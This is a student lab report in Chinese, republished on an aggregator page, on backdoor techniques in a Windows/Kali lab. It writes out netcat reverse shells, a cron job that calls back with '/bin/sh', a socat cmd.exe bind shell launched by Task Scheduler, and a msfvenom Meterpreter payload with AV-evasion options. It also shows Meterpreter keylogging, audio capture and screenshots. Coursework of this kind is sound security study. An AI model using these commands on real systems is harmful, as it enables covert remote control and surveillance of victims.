当前位置: 首页 > news >正文

网站建设推广有没有/网络推广人员

网站建设推广有没有,网络推广人员,幸运28网站开发,网站1g空间多大20155330 《网络对抗》 实验二 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网站上下载非官方软件,所下载的软件中携带伪装过的后门程序。例举你知道的后门如何启动起来(win及linux)的方式? 将后门程序伪…

20155330 《网络对抗》 实验二 后门原理与实践

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?

    在网站上下载非官方软件,所下载的软件中携带伪装过的后门程序。

  2. 例举你知道的后门如何启动起来(win及linux)的方式?

    将后门程序伪装为被启动项目。

  3. Meterpreter有哪些给你映像深刻的功能?

    记录音频、获取入侵主机权限。

  4. 如何发现自己有系统有没有被安装后门?

    使用杀毒软件进行查杀。

    实验内容

  5. 使用netcat获取主机操作Shell,cron启动
  6. 使用socat获取主机操作Shell, 任务计划启动
  7. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  8. 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    常用后门工具

    准备工作

  9. 打开cmd,输入ipconfig获取windows系统的IP地址和相关信息。
    • win10系统IP:192.168.43.248
      1071510-20180403121148139-597523762.png
    • win7系统IP:192.168.204.135
      1071510-20180403121459916-313967166.png
  10. 打开终端,输入ifconfig -a获取Kali的IP地址和相关信息。

Win获得Linux Shell

以下实践Windows基于Win10-64bit, Kali2-64bit.

  1. windows 打开监听

1071510-20180403121150409-183234824.png

  1. Linux反弹连接win

1071510-20180403121255311-1374576849.png

  1. windows下获得一个linux shell,可运行任何指令,如ls

1071510-20180403121152078-754662139.png

Linux获得Win Shell

以下实践Windows基于Win7-64bit, Kali2-64bit.(后同)

1.Linux运行监听指令

1071510-20180403121903696-279049438.png

2.Windows反弹连接Linux

1071510-20180403121741112-363252562.png

3.Linux下看到Windows的命令提示

1071510-20180403121647818-1997436285.png

nc传输数据

在win7的cmd中使用ncat.exe -l 5330监听端口,Kali中使用nc win7主机IP 5330连接win7系统输入数据,在win7同步显示。
1071510-20180403121946513-575849463.png

1071510-20180403121950307-337873227.png

使用netcat获取主机操作Shell,cron启动
  1. 在windows系统下监听5330端口
    1071510-20180403124145332-603945234.png
  2. crontab -e指令编辑一条定时任务(使用VIM编辑器编辑),在最后一行添加43 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh(时间设置在Kali系统当前时间的后一分钟)
    1071510-20180403123952967-1594483454.png
  3. 时间到43分时,windows系统获得Kali的shell,在cmd中输入命令whoami得到结果
    1071510-20180403124059881-300361495.png

    SoCat
  4. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器
    1071510-20180403125532064-714879238.png
  5. 在操作->程序/脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5330 exec:cmd.exe,pty,stderr(作用:把cmd.exe绑定到端口5215,同时将cmd.exe的stderr重定向到stdout)
    1071510-20180403125532962-1168397230.png
  6. 在Kali环境下输入指令socat - tcp:192.168.204.135:5330,第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5330端口,此时可成功获得cmd shell
    1071510-20180403130839507-2144988209.png

    2.2 Meterpreter

生成20155330_backdoor.exe,复制到Win

  1. 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.135 LPORT=5330 -f exe > 20155330_backdoor.exe生成后门程序

1071510-20180403122745355-2082126502.png
1071510-20180403122801893-2130836607.png
1071510-20180403122803052-1956433727.png

  1. 通过nc指令将生成的后门程序传送到Windows主机上
    1071510-20180403133157456-1007646483.png
  • 参数说明:

    参数相关说明
    -p使用的payload。windows/meterpreter/reverse_tcp相当于shellcode。
    -x使用的可执行文件模板,payload(shellcode)写入到该可执行文件中。
    -e使用的编码器,用于对shellcode变形,为了免杀。
    -i编码器的迭代次数。
    -bbadchar是payload中需要去除的字符。
    LHOST是反弹回连的IP
    LPORT是回连的端口
    -f生成文件的类型
    >输出到哪个文件

MSF打开监听进程

  1. 打开msfconsole
    1071510-20180403133238026-1224151571.png
  2. 输入use exploit/multi/handler进行侦听,并设置相关参数.
    1071510-20180403133313045-1332052291.png
  3. 设置完成后,执行监听。Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell
    1071510-20180403133400779-498547455.png

Meterpreter常用功能

  1. 使用record_mic截获一段音频
    1071510-20180403135617704-1796849944.png
  2. 使用screenshot截屏
    1071510-20180403135617864-1701116236.png
  3. 使用keyscan_start指令记录击键的过程,使用keyscan_dump指令读取击键的记录
    1071510-20180403135618765-1807019066.png
  4. 使用getuid指令查看当前用户
    1071510-20180403135621691-637444938.png

实验体会

此次实验首先要保证Kali和windows系统主机能够通过网络相互连接,才能进行之后的步骤。实验中主要遇到的问题就是电脑的摄像头无法连接到虚拟机,甚至在本机上也经常出现错误,应该是开学初的强制更新过程中驱动出了问题。

转载于:https://www.cnblogs.com/ashin-kl/p/8708160.html

http://www.lbrq.cn/news/1403911.html

相关文章:

  • 团购网站营销方案/快速优化排名公司推荐
  • 中国网站排名站长之家/crm客户管理系统
  • dede织梦php文章图片网站源码 完整后台 带在线音乐/优化大师电脑版官网
  • 网站受到攻击 怎么做/广东seo加盟
  • 外贸网站建设报价差别那么大花钱多吃亏/太原自动seo
  • 什么网站广告做多/搜索关键词排名优化技术
  • 东莞企创做网站怎么样/交易平台
  • 多钱网网站/seo月薪
  • 怎么样再自己的网站做二级域名/上海最近三天的新闻
  • 宜昌 公司 网站建设/2021年重大新闻事件
  • 湖南平台网站建设公司/营销推广案例
  • 东莞市人民政府/淘宝优化关键词的步骤
  • 网站后台权限管理/微信推广软件哪个好
  • 网站主机查询/seo专业培训机构
  • 广元商城网站开发/百度问答下载安装
  • 石狮网站建设联系电话/自己如何制作网页
  • 校园网站设计的毕业论文/购买友情链接
  • 国外做装饰画的网站/百度搜索名字排名优化
  • 漫画网站开发/黑帽seo优化推广
  • 爬闪数媒 网站建设/哪里搜索引擎优化好
  • 网站首页的动态效果图怎么做/网站seo报告
  • 长宁区网站建设网页制/网站建设与管理主要学什么
  • 泛微e8做网站门户/小学四年级摘抄新闻
  • 网站字体特效/seo关键词推广怎么做
  • 网站建设优化是什么鬼/关键词权重如何打造
  • 涞水县住房和城乡建设局网站/郴州网站推广
  • 网站付费推广/网站快速优化排名app
  • 上海建站市场/百度推广上班怎么样
  • 做网站做百度竞价赚钱/网络推广公司联系方式
  • 想要给网站加视频怎么做/seo实战培训机构
  • sfc_os!SfcQueueValidationRequest函数分析之sfc_os!IsFileInQueue
  • python学习DAY46打卡
  • CNN 在故障诊断中的应用:原理、案例与优势
  • 从零开始的云计算生活——第四十六天,铁杵成针,kubernetes模块之Configmap资源与Secret资源对象
  • python的社区互助养老系统
  • 瑞萨e2studio:HardwareDebug配置项详解